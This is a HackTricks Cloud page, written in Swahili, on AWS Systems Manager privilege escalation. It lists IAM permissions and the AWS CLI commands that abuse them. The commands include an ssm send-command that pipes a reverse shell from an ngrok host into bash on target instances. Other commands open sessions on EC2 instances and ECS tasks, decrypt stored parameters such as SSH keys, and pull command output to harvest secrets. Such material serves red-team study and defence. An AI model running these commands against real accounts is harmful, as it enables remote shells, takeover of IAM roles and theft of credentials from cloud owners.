HackTricks CloudAWS - SSM Privesc
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
SSM
Kwa maelezo zaidi kuhusu SSM angalia:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
ssm:SendCommand
Mshambuliaji mwenye ruhusa ssm:SendCommand anaweza kutekeleza amri katika mifano inayotumia Amazon SSM Agent na kuathiri IAM Role inayotumia ndani yake.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
Ikiwa unatumia mbinu hii kuongeza mamlaka ndani ya EC2 instance ambayo tayari imeathiriwa, unaweza tu kukamata rev shell kwa ndani kwa:
# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotembea yenye SSM Agents inayoendesha.
ssm:StartSession
Mshambuliaji mwenye ruhusa ssm:StartSession anaweza kuanzisha kikao kama cha SSH katika mifano inayotembea yenye Amazon SSM Agent na kushambulia IAM Role inayotembea ndani yake.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"
caution
Ili kuanzisha kikao unahitaji SessionManagerPlugin iliyosakinishwa: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
Athari Zinazoweza Kutokea: Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotembea yenye SSM Agents inayoendesha.
Privesc kwa ECS
Wakati ECS tasks zinapokimbia na ExecuteCommand imewezeshwa, watumiaji wenye ruhusa za kutosha wanaweza kutumia ecs execute-command ili kutekeleza amri ndani ya kontena.
Kulingana na nyaraka hii inafanywa kwa kuunda channel salama kati ya kifaa unachotumia kuanzisha amri ya “exec” na kontena lengwa na SSM Session Manager. (SSM Session Manager Plugin inahitajika ili hii ifanye kazi)
Hivyo, watumiaji wenye ssm:StartSession wataweza kupata shell ndani ya ECS tasks ikiwa chaguo hicho kimewezeshwa kwa kukimbia:
aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
.png)
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa ECSIAM roles zilizounganishwa na kazi zinazotembea zikiwa na ExecuteCommand imewezeshwa.
ssm:ResumeSession
Mshambuliaji mwenye ruhusa ssm:ResumeSession anaweza ku-anzisha tena kikao kama cha SSH katika mifano inayotembea na Amazon SSM Agent ikiwa na hali ya kikao cha SSM kilichounganishwa na kuathiri IAM Role inayotembea ndani yake.
# Check for configured instances
aws ssm describe-sessions
# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotembea yenye SSM Agents zinazotembea na vikao vilivyokatishwa.
ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)
Mshambuliaji mwenye ruhusa zilizoelezwa atakuwa na uwezo wa kuorodhesha SSM parameters na kuvisoma kwa maandiko wazi. Katika vigezo hivi unaweza mara nyingi kupata taarifa nyeti kama funguo za SSH au funguo za API.
aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption
Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya vigezo.
ssm:ListCommands
Mshambuliaji mwenye ruhusa hii anaweza kuorodhesha amri zote zilizotumwa na kwa matumaini kupata taarifa nyeti juu yao.
aws ssm list-commands
Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya mistari ya amri.
ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)
Mshambuliaji mwenye ruhusa hizi anaweza kuorodhesha amri zote zilizotumwa na kusoma matokeo yaliyotolewa akitumaini kupata taarifa nyeti ndani yake.
# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations
aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya matokeo ya amri za mistari.
Codebuild
Unaweza pia kutumia SSM kuingia ndani ya mradi wa codebuild unaojengwa:
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.